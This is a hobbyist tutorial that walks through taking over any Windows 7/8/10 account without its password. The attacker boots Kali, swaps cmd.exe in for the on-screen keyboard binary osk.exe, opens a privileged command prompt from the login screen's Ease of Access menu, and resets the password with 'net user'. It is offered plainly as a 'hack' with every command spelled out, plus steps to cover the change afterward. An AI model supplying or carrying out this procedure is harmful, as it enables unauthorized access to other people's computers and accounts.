Hack Any Windows 7/8/10 User Password Without Logging In

Warning: This resets your password, it does NOT tell you what your old password was, making things such as the windows password based encryptions unaccessible, as this isn't changing your password, so it will not update.

This exploit takes advantage of the ease of access tool on the login page by 'tricking' windows into launching a fully privileged command prompt by selecting 'on the screen keyboard' this is done by renaming the on the screen keyboard exe to something random, and renaming the cmd.exe to on the screens previous name. It will all make since later.

Step 1:Launch Any OS That Allow Full Access to the Windows Folders

In this case, I am going to be using Kali. Although you can use many different linux distros or even a windows disk/usb, as long as you can access the terminal/command prompt your good.

Step 2:Navigate to Sys32

I'm going to infer you know basic navigation and be able to navigate to the Windows partition.

In my case, im currently writing this on my laptop rather than my desktop, so my Windows is known as BOOTCAMP, as I am on a macbook with Windows dual booted.

Once you reach this location, cd to Windows, then to System32.

Step 3:Rename osk.exe to osk.exe.old

oks.exe is the name of the ease of access 'On screen keyboard' file. Rename this using whatever your systems rename command is, in Kali the command would be: mv osk.exe osk.exe.old

Step 4:Rename cmd.exe to osk.exe

Now I'm sure you see how this works, but ill explain it anyways. Basically, when you press 'on screen keyboard' in the ease of access terminal, Windows launched osk.exe, which normally is the on screen keyboard application. But we changed it to launch cmd instead. Like magic.
Command: <system rename command> cmd.exe osk.exe
Kali: mv cmd.exe osk.exe

Step 5:Launch Windows and Select 'on Screen Keyboard' in Ease of Access Menu

I found this picture off of the interwebs, but what you normally see should be something like this. After going through all the steps above, you should instead see a command prompt.

Sorry for crappy picture, couldn't find how to take screen shot on login menu.

Step 6:Resetting the Password

Now you can type in the magical command to change the password.
The Command: net user <USERNAME in quotes> <PASSWORD>
Example: net user "Admin" temppass

Step 7:Finished! You Can Login Now!

Viola, you can now login with whatever password you typed in. If you want to reset it simply go back to Kali and redo what you've done! Rename osk.exe to cmd.exe and rename osk.exe.old to osk.exe

Well that's it for my first post! I came across this exploit a while ago and found that it still works so I don't know how common this is or anything like that. Hopefully its not too popular and too many this article is something new! Well, Enjoy!